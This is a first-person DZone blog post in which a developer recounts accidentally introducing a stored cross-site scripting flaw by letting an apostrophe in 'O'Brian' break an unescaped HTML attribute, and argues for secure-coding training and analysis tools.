Over a million developers have joined DZone.
{{announcement.body}}
{{announcement.title}}

Confessions of an Insecure Coder

DZone's Guide to

Confessions of an Insecure Coder

Hello, I'm a developer, and I once put a Cross-Site Scripting Error into my code. But seriously, read on to see how this mistake turned this dev into a secure coding professional.

· Security Zone
Free Resource

Discover an in-depth knowledge about the different kinds of iOS hacking tools and techniques with the free iOS Hacking Guide from Security Innovation.

My name is Laurie Mercer, and I have introduced a security vulnerability into software.

The year was 2004. As I traveled to work, Franz Ferdinand and The Killers blared on my cool new iPod. I was a developer, my first proper job after graduating with a degree in computer science and moving to the big city. Responsible for implementing functional changes, I would code new forms and business logic in response to customer change requests. The project was in the "maintenance phase" - so the majority of the development team had already moved on, and the changes were typically small.

One summer day, I received a request: a user had a last name that could not be entered into the system. The problem was that the name contained a single quote character: an O'Brian. The only characters the system allowed were alphanumeric, so when the user hit the submit button, an error displayed. I duly looked at the source code and spotted a simple change: allow non-alpha numeric characters, including the single quote character.

The change was simple, and we quickly came to testing. I loaded the system (in Internet Explorer 6, of course), entered "Mercer" in the surname field, and pressed submit. Milliseconds later, the test was confirmed as a success. I then entered the troublesome text, the name with the single quote. It submitted just fine, but when the form was displayed back to me, I only saw an "O." Where was Brian?

I checked the SQL server. O'Brian was the value stored in the database. I loaded the page again (wincing at the lack of "Brian"), and loaded up the source code viewer. O'Brian was there! It looked something like this:

<input id=’id’ type=‘text’ name=’surname’ value=‘O’Brian’ readonly>

Can you spot the error?

The O' character closes the quote, and the browser assumes that the rest of the Brian' is "behind the scenes" HTML or JavaScript - instructions for the web browser and not for human consumption.

I had accidentally introduced a persistent Cross Site Scripting (XSS) vulnerability into the system!

The implications of this defect are serious. I could enter an <IMG> tag and display a picture of a cat. More seriously, this could be used to deface websites - the digital equivalent of graffiti. XSS can even be used to steal people's sessions, find out what their Internet address is, and what web browser they are using.

Cross Site Scripting (XSS) is so serious, it is included in the OWASP Top 10, a list of the 10 most critical web application security risks. Everyone who develops web applications should be aware of this list. Everyone who develops modern software applications should be enabled to test for the vulnerabilities it describes, either through code review, static analysis, or dynamic analysis.

How could this have happened? It's simple - I made a mistake. I was a naïve new graduate who had been taught how to code, but not taught about software security. I also had no access to static or dynamic analysis engines to check code for security flaws in the SDLC - we relied on fallible human code reviews performed by developers with no security domain expertise.

It seems incredible to me now that I was put on a software project as a developer with no security training and no access to any security tools. If our functional changes did not work as expected, there were serious penalties, yet there was no consideration of secure coding. Like Leibniz, the inventor of the binary number system, we assumed a "Best of All Possible Worlds." In fact, the only mention of security was with regard to authenticating the system - strong passwords, encrypting data in transit, and the vetting of staff who could access data. This age of innocence is certainly past. As any security consultant will tell you, over the past decades, the neglect of application security has resulted in thousands of systems with super secure password policies, and SQL injection on their login pages.

Today it is uncontroversial to say that any software engineer working on any code, especially web and mobile development, should be trained in secure coding and should have access to tools that allow security flaws to be detected systematically throughout the SDLC. Yet at Veracode, we still see OWASP Top 10 flaws in the majority of applications we assess. Perhaps we need to not only shift left in the SDLC, but also in the way we train software engineers? I am sometimes asked what is the one thing I wish I had learned about in computer science, something that I felt was missing from the curriculum that could have helped me later. For me, the answer is simple: software security.

Learn about the importance of a strong culture of cybersecurity, and examine key activities for building – or improving – that culture within your organization.

Topics:
security ,secure coding ,cross site scripting

Published at DZone with permission of Laurie Mercer, DZone MVB. See the original article here.

Opinions expressed by DZone contributors are their own.

{{ parent.title || parent.header.title}}

{{ parent.tldr }}

{{ parent.urlSource.name }}